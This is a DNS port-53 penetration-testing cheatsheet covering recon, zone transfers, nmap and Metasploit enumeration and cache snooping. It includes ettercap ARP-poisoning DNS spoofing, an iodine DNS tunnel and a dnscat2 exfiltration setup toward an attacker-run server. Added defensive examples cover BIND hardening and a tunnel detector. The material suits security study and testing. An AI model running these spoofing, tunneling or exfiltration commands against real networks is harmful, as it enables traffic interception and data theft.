
DNS Pentest - Port 53


Recon


Banner Grabbing - Identify DNS Server Versions

# Use dig to determine DNS server versions
dig version.bind CHAOS TXT @<DNS_IP>

# Alternatively, use an nmap script to grab the banner
nmap --script dns-nsid <DNS_IP>

# Alternatively, use netcat to open a raw UDP connection to the server
nc -nv -u <DNS_IP> 53
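The `version.bind` query above is an ordinary DNS message with the CHAOS class instead of IN. The following added example (not code from the original cheatsheet) builds that exact query byte for byte and parses the TXT strings out of a reply, so a defender can see what the check sends and what a server that has not hidden its version gives back. `SAMPLE_RESPONSE` and the version string `example-9.x` are constructed for the example, not captured from a real server.

```python
import struct

# Added example (not from the original cheatsheet): build the CHAOS-class TXT
# query for version.bind that `dig version.bind CHAOS TXT @server` sends, and
# parse the TXT strings out of the reply. SAMPLE_RESPONSE below is constructed,
# not captured from a real server.

CLASS_CH = 3     # CHAOS class, used for server-identity pseudo-records
TYPE_TXT = 16

def encode_name(name: str) -> bytes:
    """Encode a dotted name as length-prefixed labels (RFC 1035, section 3.1)."""
    out = b"".join(bytes([len(label)]) + label.encode("ascii")
                   for label in name.rstrip(".").split("."))
    return out + b"\x00"

def build_version_query(txid: int = 0x1234) -> bytes:
    """12-byte header (RD clear, one question) + question version.bind CH TXT."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name("version.bind") + struct.pack("!HH", TYPE_TXT, CLASS_CH)

def read_name(msg: bytes, offset: int):
    """Decode a possibly compressed name; return (name, offset just after it)."""
    labels, jumped, end = [], False, offset
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:                      # compression pointer
            pointer = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            if not jumped:
                end = offset + 2
            jumped, offset = True, pointer
            continue
        if length == 0:
            offset += 1
            break
        labels.append(msg[offset + 1:offset + 1 + length].decode("ascii"))
        offset += 1 + length
    return ".".join(labels), (end if jumped else offset)

def parse_txt_answers(msg: bytes) -> list:
    """Return the TXT strings from every TXT answer RR in a DNS response."""
    _txid, _flags, qdcount, ancount, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    offset = 12
    for _ in range(qdcount):                           # skip the question section
        _, offset = read_name(msg, offset)
        offset += 4                                    # QTYPE + QCLASS
    texts = []
    for _ in range(ancount):
        _, offset = read_name(msg, offset)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", msg[offset:offset + 10])
        offset += 10
        rdata, offset = msg[offset:offset + rdlen], offset + rdlen
        if rtype == TYPE_TXT:                          # <len><chars> repeated
            i = 0
            while i < len(rdata):
                slen = rdata[i]
                texts.append(rdata[i + 1:i + 1 + slen].decode("ascii", "replace"))
                i += 1 + slen
    return texts

# Constructed reply: QR+AA set, question echoed, one TXT answer via a name pointer
VERSION_STRING = b"example-9.x"
SAMPLE_RESPONSE = (
    struct.pack("!HHHHHH", 0x1234, 0x8400, 1, 1, 0, 0)
    + encode_name("version.bind") + struct.pack("!HH", TYPE_TXT, CLASS_CH)
    + b"\xC0\x0C"                                      # pointer to the name at offset 12
    + struct.pack("!HHIH", TYPE_TXT, CLASS_CH, 0, len(VERSION_STRING) + 1)
    + bytes([len(VERSION_STRING)]) + VERSION_STRING
)

if __name__ == "__main__":
    print(build_version_query().hex())
    print(parse_txt_answers(SAMPLE_RESPONSE))           # ['example-9.x']
```

On the defending side, BIND lets you replace the string with `options { version "not disclosed"; };`, after which the same query returns that text instead of the release number; the parser above shows whatever the server chose to answer.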

DNS Server Discovery

# Using dig
dig NS <target-domain>

# Using nslookup
nslookup -type=NS <target-domain>



Enumeration


Using DNS enum

dnsenum --dnsserver <DNS_IP> --enum -p 0 -s 0 -o subdomains.txt -f <WORDLIST> <DOMAIN>


Using dig

# Query DNS records
dig hackviser.com

# Query a specific type of DNS record (e.g., A record)
dig A hackviser.com

# Perform a reverse DNS lookup
dig -x <IP_ADDRESS>

# Query a specific DNS server
dig @<DNS_SERVER_IP> hackviser.com

Using nslookup

# Perform DNS queries
nslookup hackviser.com

# Query a specific type of DNS record (e.g., MX record)
nslookup -type=MX hackviser.com

# Query a specific DNS server
nslookup hackviser.com <DNS_IP>

Using host

# Perform a DNS query
host hackviser.com

# Query a specific type of DNS record (e.g., MX record)
host -t MX hackviser.com

# Perform a reverse DNS lookup
host <IP_ADDRESS>

Any Record Query

dig any victim.com @<DNS_IP>

Zone Transfer

# Without specifying a domain
dig axfr @<DNS_IP>

# With guessing the domain
dig axfr @<DNS_IP> <DOMAIN>

# Alternatively, use fierce for zone transfers or dictionary attacks
fierce --domain <DOMAIN> --dns-servers <DNS_IP>
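The AXFR commands above only return the zone when the authoritative server is willing to hand it to any client. As an added example (not from the original post), the BIND 9 `named.conf` fragments below show the permissive setting that makes the transfer succeed, then the restricted form that limits transfers to a named secondary, optionally authenticated with a TSIG key. The zone name, secondary address and key secret are placeholders.

```conf
// Weak: every client that can reach port 53 can pull the whole zone with `dig axfr`
options {
    allow-transfer { any; };
};

// Hardened: deny transfers globally, then allow them per zone to the secondary
// only, authenticated with a TSIG key (secret value is a placeholder).
key "xfer-key" {
    algorithm hmac-sha256;
    secret "REPLACE-WITH-BASE64-KEY";
};

options {
    allow-transfer { none; };          // default-deny for every zone
};

zone "example.com" {
    type master;
    file "db.example.com";
    allow-transfer { key "xfer-key"; 192.0.2.10; };   // secondary only
};
```

After the change, `dig axfr example.com @<DNS_IP>` from any host other than the secondary should report `; Transfer failed.`, which is the result a periodic self-check from outside the network should expect.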

Metasploit Modules and Nmap Scripts

msfconsole (use auxiliary/gather/enum_dns)

nmap -n --script "(default and *dns*) or fcrdns or dns-srv-enum or dns-random-txid or dns-random-srcport" <IP>

# Find the DNS server
nmap --script vuln,vulners --script-args mincvss=7.0 -sC -sV -p 53 --open 10.10.0.0/16
nmap -sU -sV --script "dns* and (discovery or vuln) and not (dos or brute)" -p53 10.10.10.10

# DNS server processes unauthoritative recursive queries
nmap -Pn -p 53 -sU --script dns-recursion 10.10.10.10

# DNS server cache snooping remote information disclosure
nmap -Pn -sU -sV -p 53 --script dns-cache-snoop 10.10.10.10

# DNS enum via Metasploit
auxiliary/gather/enum_dns
auxiliary/scanner/dns/dns_amp

# DNS enum with nslookup: give the IP address of the server to find its hostname
nslookup
> SERVER 10.10.10.1
> 10.10.10.10
10.10.10.10.in-addr.arpa name = host02.test.domain.

dig axfr host02.test.domain @10.10.10.1


DNS Reverse and Subdomain Brute Force

dnsrecon -r 127.0.0.0/24 -n <IP_DNS>
dnsrecon -r 127.0.1.0/24 -n <IP_DNS>
dnsrecon -r <IP_DNS>/24 -n <IP_DNS>
dnsrecon -d active.htb -a -n <IP_DNS>


DNS Cache Snooping

# Querying the DNS cache
dnsrecon -t std -d hackviser.com -D /usr/share/dnsrecon/namelist.txt

DNS Enumeration with Google Dorks

# Collecting DNS information using Google Dorks
site:hackviser.com -www.hackviser.com -site:www.hackviser.com

DNS Hacking tools

DNS Dumpster
DNS Recon
Spyse
SecurityTrails
DNSlytics


DNS CertSpotter

Subdomain Enumeration


Attack Vectors


DNS Spoofing

Poisoning with Ettercap

ettercap -T -q -M arp:remote /<gateway-ip>// /<target-ip>// -P dns_spoof

DNS Tunneling

# Server side
iodined -f -c <tunnel-ip> <domain>

# Client side
iodine <dns-server-ip> <domain>
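Tunnels like the iodine pair above and dnscat2 below have to push their payload through query names, which is what makes them visible in resolver logs: unusually long labels, labels with near-random character distributions, and a steady stream of unique names under one domain, often using payload-heavy record types. The added example below (not from the original post) applies those heuristics to constructed query-log lines in the form `<timestamp> <client> <qname> <qtype>`; the tunnel-looking names carry 48-hex-character data labels under the placeholder domain `tunnel-example.net`, and the thresholds are starting points, not tuned values.

```python
import math
from collections import defaultdict

# Added example (not from the original post): a heuristic detector for
# iodine/dnscat2-style tunneling over DNS query logs. SAMPLE_LOG lines are
# constructed ("<timestamp> <client> <qname> <qtype>"); the tunnel-looking
# names carry 48-hex-character data labels under the placeholder domain
# tunnel-example.net.

DATA_LABELS = [
    "3a9f0c7e1d5b8246f0e1d2c3b4a596876b2d8f4a0c9e1375",
    "6b2d8f4a0c9e13753a9f0c7e1d5b8246f0e1d2c3b4a59687",
    "f0e1d2c3b4a596876b2d8f4a0c9e13753a9f0c7e1d5b8246",
    "3a9f0c7e1d5b82466b2d8f4a0c9e1375f0e1d2c3b4a59687",
    "f0e1d2c3b4a596873a9f0c7e1d5b82466b2d8f4a0c9e1375",
]
SAMPLE_LOG = [
    "2024-05-01T10:00:01Z 10.0.0.5 www.example.com A",
    "2024-05-01T10:00:02Z 10.0.0.5 mail.example.com MX",
    "2024-05-01T10:00:03Z 10.0.0.6 cdn-assets.example.com A",
    "2024-05-01T10:00:04Z 10.0.0.6 api.internal.example.com AAAA",
] + [f"2024-05-01T10:01:0{i}Z 10.0.0.7 {label}.t.tunnel-example.net TXT"
     for i, label in enumerate(DATA_LABELS)]

MAX_LABEL_LEN = 30      # ordinary hostnames rarely approach the 63-byte label limit
ENTROPY_BITS = 3.5      # hex/base32 payloads sit near 4.0 bits/char; words sit well below 3
RARE_QTYPES = {"TXT", "NULL"}   # payload-heavy types that tunnelling tools favour
MIN_HITS = 3            # suspicious queries per base domain before it is reported

def shannon_entropy(s: str) -> float:
    """Bits per character of the string's character distribution."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def base_domain(qname: str) -> str:
    """Last two labels; real code would consult the public suffix list."""
    return ".".join(qname.rstrip(".").split(".")[-2:])

def parse_log_line(line: str) -> dict:
    ts, client, qname, qtype = line.split()
    return {"ts": ts, "client": client, "qname": qname.lower(), "qtype": qtype.upper()}

def suspicious_reasons(qname: str, qtype: str) -> list:
    """Per-query indicators; an empty list means the query looks ordinary."""
    first = qname.split(".")[0]
    reasons = []
    if len(first) >= MAX_LABEL_LEN:
        reasons.append("long-label")
    if len(first) >= 20 and shannon_entropy(first) >= ENTROPY_BITS:
        reasons.append("high-entropy-label")
    if qtype in RARE_QTYPES:
        reasons.append(f"qtype-{qtype}")
    return reasons

def detect_tunnels(lines, min_hits: int = MIN_HITS) -> dict:
    """Map base domain -> {hits, unique_names, reasons} for domains over the threshold."""
    stats = defaultdict(lambda: {"hits": 0, "names": set(), "reasons": set()})
    for line in lines:
        q = parse_log_line(line)
        reasons = suspicious_reasons(q["qname"], q["qtype"])
        if reasons:
            entry = stats[base_domain(q["qname"])]
            entry["hits"] += 1
            entry["names"].add(q["qname"])
            entry["reasons"].update(reasons)
    return {dom: {"hits": e["hits"], "unique_names": len(e["names"]),
                  "reasons": sorted(e["reasons"])}
            for dom, e in stats.items() if e["hits"] >= min_hits}

if __name__ == "__main__":
    for dom, info in detect_tunnels(SAMPLE_LOG).items():
        print(dom, info)
```

The per-domain aggregation matters more than any single indicator: one long TXT query is noise (large SPF or DKIM records look similar), but dozens of unique, high-entropy names under the same domain from one client is the shape of a tunnel, and is the pattern to alert on from resolver query logs.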

Post-Exploitation


Cache Snooping

dig @<dns-server> <domain> +norecurse
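`+norecurse` clears the RD (recursion desired) bit, so the server may only answer from what it already holds; the nmap `dns-recursion` and `dns-cache-snoop` scripts listed earlier read the same header fields. The added example below (not from the original post) builds such a non-recursive query and classifies a reply from its header: REFUSED means the cache is closed to this client, AA means the server is authoritative for the name (which says nothing about its cache), an answer without AA means the record was cached, and an empty reply means it was not. The replies are constructed for the example, not captured from a real server.

```python
import struct

# Added example (not from the original post): build a non-recursive query and
# interpret the header of the reply the way a cache-snooping check does.
# The replies below are constructed, not captured from a real server.

FLAG_QR, FLAG_AA, FLAG_RD, FLAG_RA = 0x8000, 0x0400, 0x0100, 0x0080
RCODE_REFUSED = 5
TYPE_A, CLASS_IN = 1, 1

def encode_name(name: str) -> bytes:
    """Dotted name -> length-prefixed labels, terminated by a zero byte."""
    out = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.rstrip(".").split("."))
    return out + b"\x00"

def build_query(name: str, recursion_desired: bool = False, txid: int = 0x4242) -> bytes:
    """Header + one A/IN question; RD cleared is what `dig +norecurse` sends."""
    flags = FLAG_RD if recursion_desired else 0
    header = struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", TYPE_A, CLASS_IN)

def interpret_response(msg: bytes) -> dict:
    """Classify a reply to a non-recursive query from its 12-byte header."""
    _txid, flags, _qd, ancount, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    rcode = flags & 0x000F
    info = {
        "recursion_available": bool(flags & FLAG_RA),   # what nmap dns-recursion reports
        "authoritative": bool(flags & FLAG_AA),
        "answers": ancount,
    }
    if rcode == RCODE_REFUSED:
        info["verdict"] = "refused"         # cache/recursion closed to this client
    elif flags & FLAG_AA:
        info["verdict"] = "authoritative"   # server's own zone; says nothing about its cache
    elif ancount > 0:
        info["verdict"] = "cached"          # answered without recursing: record was in cache
    else:
        info["verdict"] = "not-cached"
    return info

def make_response(query: bytes, flags: int, answers: int = 0) -> bytes:
    """Constructed reply: echo the question, optionally append A records (192.0.2.1)."""
    txid = struct.unpack("!H", query[:2])[0]
    msg = struct.pack("!HHHHHH", txid, flags, 1, answers, 0, 0) + query[12:]
    for _ in range(answers):
        msg += b"\xC0\x0C" + struct.pack("!HHIH", TYPE_A, CLASS_IN, 300, 4) + bytes([192, 0, 2, 1])
    return msg

# Constructed exchange for a name the resolver is not authoritative for
QUERY = build_query("www.example.com")
CACHED = make_response(QUERY, FLAG_QR | FLAG_RA, answers=1)
EMPTY = make_response(QUERY, FLAG_QR | FLAG_RA)
REFUSED = make_response(QUERY, FLAG_QR | RCODE_REFUSED)

if __name__ == "__main__":
    for label, reply in (("cached", CACHED), ("empty", EMPTY), ("refused", REFUSED)):
        print(label, interpret_response(reply))
```

The fix on a BIND resolver is to make the "refused" branch the one outsiders hit: restrict `allow-recursion` and `allow-query-cache` to the networks the resolver serves, and set `recursion no;` on servers that are authoritative only, so non-recursive probes from outside get REFUSED rather than a view of the cache.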

Reverse DNS Lookup

dig -x <ip-address>

Exfiltration with dnscat2

# Server side
dnscat2 --dns server=<dns-server-ip>:53

# Client side
dnscat2 <domain>
